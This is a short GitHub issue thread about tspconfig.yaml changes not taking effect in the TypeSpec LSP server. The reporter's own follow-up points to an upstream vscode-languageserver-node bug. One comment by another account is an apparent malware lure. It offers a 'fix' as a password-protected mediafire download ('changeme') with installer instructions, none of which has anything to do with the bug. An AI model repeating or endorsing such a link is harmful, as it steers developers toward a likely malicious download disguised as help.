### ISSUE TITLE
[Bug]: [IDE] changing tspconfig.yaml won't take effect in LSP server

### ISSUE THREAD

**Issue by RodgeFu** [microsoft/typespec#4278]
### Describe the bug

When user changes tspconfig.yaml, the change won't take effect in LSP server. It seems changing tspconfig.yaml won't trigger onDidChangeContent event and clean up the file cache in LSP server.

### Reproduction

make some change in tspconfig.yaml and check whether it takes effect in the LSP server compilation.

### Checklist

- [X] Follow our [Code of Conduct](https://github.com/microsoft/typespec/blob/main/CODE_OF_CONDUCT.md)
- [X] Check that there isn't already an issue that request the same bug to avoid creating a duplicate.
- [X] Check that this is a concrete bug. For Q&A open a [GitHub Discussion](https://github.com/Microsoft/typespec/discussions).
- [X] The provided reproduction is a [minimal reproducible example](https://stackoverflow.com/help/minimal-reproducible-example) of the bug.

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by RodgeFu** [comment]
bug filed to vscode:
https://github.com/microsoft/vscode-languageserver-node/issues/1554
